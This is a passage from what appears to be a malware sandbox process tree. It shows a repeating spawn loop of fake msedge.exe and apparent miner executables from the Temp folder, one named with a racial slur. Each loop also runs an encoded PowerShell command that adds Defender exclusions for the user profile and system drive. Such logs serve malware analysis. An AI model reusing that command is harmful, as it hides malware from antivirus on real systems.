        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        273⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        273⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        273⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        274⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        274⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        274⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        275⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        275⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        275⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        276⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        276⤵
        
        PID:2764
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        276⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        277⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        277⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        277⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        278⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        278⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        278⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        279⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        279⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        279⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        280⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        280⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        280⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        281⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        281⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        281⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        282⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        282⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        282⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        283⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        283⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        283⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        284⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        284⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        284⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        285⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        285⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        285⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        286⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        286⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        286⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        287⤵
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        287⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        287⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        288⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        288⤵
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        288⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        289⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        289⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        289⤵
        
        PID:1268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        290⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        290⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        290⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        291⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        291⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        291⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        292⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        292⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        292⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        293⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        293⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        293⤵
        
        PID:4056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        294⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        294⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        294⤵
        
        PID:3344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        295⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        295⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        295⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        296⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        296⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        296⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        297⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        297⤵
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        297⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        298⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        298⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        298⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        299⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        299⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        299⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        300⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        300⤵
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        300⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
